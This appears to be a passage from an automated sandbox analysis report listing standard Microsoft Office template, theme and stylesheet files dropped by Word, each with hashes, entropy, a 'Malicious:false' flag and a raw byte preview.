                                                                                                                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD768A.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.438490642908344
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                                SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                                SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                                SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD768A.tmp\Element design set.dotx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34415
                                                                                                                                                Entropy (8bit):7.352974342178997
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CA.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):242
                                                                                                                                                Entropy (8bit):3.4938093034530917
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                                MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                                SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                                SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                                SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CA.tmp\TabList.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4888
                                                                                                                                                Entropy (8bit):7.8636569313247335
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CB.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):3.5161159456784024
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                                SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                                SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                                SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CB.tmp\turabian.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):344303
                                                                                                                                                Entropy (8bit):5.023195898304535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CC.tmp\View.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):486596
                                                                                                                                                Entropy (8bit):7.668294441507828
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CC.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.535303979138867
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                                MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                                SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                                SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                                SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CD.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.484503080761839
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                                MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                                SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                                SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                                SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD76CD.tmp\InterconnectedBlockProcess.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9191
                                                                                                                                                Entropy (8bit):7.93263830735235
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7884.tmp\Parallax.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):924687
                                                                                                                                                Entropy (8bit):7.824849396154325
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7884.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.51145753448333
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                                MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                                SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                                SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                                SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7895.tmp\Parcel.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):608122
                                                                                                                                                Entropy (8bit):7.729143855239127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7895.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.516359852766808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                                                MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                                                SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                                                SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                                                SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7896.tmp\Basis.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):558035
                                                                                                                                                Entropy (8bit):7.696653383430889
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                Malicious:false
